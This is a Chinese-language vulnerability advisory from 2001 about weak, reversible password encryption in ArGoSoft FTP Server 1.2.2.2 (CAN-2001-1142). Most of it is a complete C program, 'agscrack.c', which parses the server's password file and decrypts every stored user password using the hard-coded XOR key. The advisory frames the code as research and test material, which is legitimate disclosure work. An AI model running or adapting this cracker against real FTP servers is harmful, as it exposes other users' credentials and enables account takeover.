首页 -> 安全研究
安全研究
安全漏洞
ArGoSoft FTP Server 脆弱密码加密漏洞
发布日期:2001-07-12
更新日期:2001-07-20
受影响系统:
描述:
ArGoSoft FTP Server 1.2.2.2
- Microsoft Windows 9x
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
BUGTRAQ ID: 3029
CVE(CAN) ID: CAN-2001-1142
ArGoSoft FTP Server是Windows平台下的FTP服务器。
由于设计的错误,导致授权用户可以访问其它用户的密码,而由于这些密码脆弱的加密
机制,导致使用第三方软件可以反向解密。
<*来源:ByteRage (byterage@yahoo.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
ByteRage (byterage@yahoo.com)提供了如下测试代码:
/********************************************************************
* agscrack.c - ArGoSoft FTP Server 1.2.2.2 password file cracker *
* by [ByteRage] <byterage@yahoo.com> [http://www.byterage.cjb.net] *
********************************************************************/
#include <string.h>
#include <stdio.h>
int len; FILE *fh;
/* DECRYPTION ALGORITHMS */
unsigned char char2bin(unsigned char inbyte) {
if ((inbyte >= 'A') && (inbyte <= 'Z')) { len++; return(inbyte-'A');
}
if ((inbyte >= 'a') && (inbyte <= 'z')) { len++;
return(inbyte-'a'+26); }
if ((inbyte >= '0') && (inbyte <= '9')) { len++; return(inbyte+4); }
if (inbyte == '+') { len++; return('\x3E'); }
if (inbyte == '/') { len++; return('\x3F'); }
return('\x00');
}
void decode(unsigned char chars[], unsigned char bytes[]) {
int i,retval=0;
for(i=0; i<4; i++) { retval <<= 6; retval |= char2bin(chars[i]); }
for(i=0; i<3; i++) { bytes[2-i] = retval & 0xFF; retval >>= 8; }
len--;
}
void decryptpass(unsigned char encrypted[], unsigned char decrypted[])
{
const unsigned char heavycrypt0[] =
"T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk
=";
unsigned int j, k=0, l;
len = 0;
for(j=0; j<strlen(encrypted); j+=4) {
decode(&encrypted[j], &decrypted[k]);
for(l=0; l<3; l++) { decrypted[k] ^= heavycrypt0[k++]; }
}
decrypted[len] = '\x00';
}
/* DECRYPTION ALGORITHMS END */
void main(int argc, char ** argv) {
char password[128]; /* ArGoSoft's passwords don't get larger than 128
bytes */
char buf[256]; char b;
int rd;
printf("ArGoSoft FTP Server 1.2.2.2 password file cracker by
[ByteRage]\n\n");
if (argc<2) { printf("Syntax : %s <password(file)>\n", argv[0]);
return 1; }
fh = fopen(argv[1], "rb");
if (!fh) {
decryptpass(argv[1], &password);
printf("%s -> %s\n", argv[1], password);
return 0;
} else {
/* simple password file processor */
fread(&buf,1,1,fh);
if (buf[0] == 4) {
while (1) {
if (fread(&b,1,1,fh) == 0) { break; }
if (fread(&buf,1,b+1,fh) == 0) { break; }
printf("%s : ", buf);
b=0; while(!b) if (fread(&b,1,1,fh) == 0) { break; }
if (fread(&buf,1,b+1,fh) == 0) { break; }
decryptpass(&buf, &password);
printf("%s -> %s\n", &buf, password);
b=0; while(!b) if (fread(&b,1,1,fh) == 0) { break; }
if (fread(&buf,1,b+1,fh) == 0) { break; }
b=0; while(b!=4) if (fread(&b,1,1,fh) == 0) { break; }
}
} else printf("error when processing passwordfile!");
fclose(fh);
}
}
建议:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.argosoft.com/applications/ftpserver/
浏览次数:3662
严重程度:0(网友投票)
绿盟科技给您安全的保障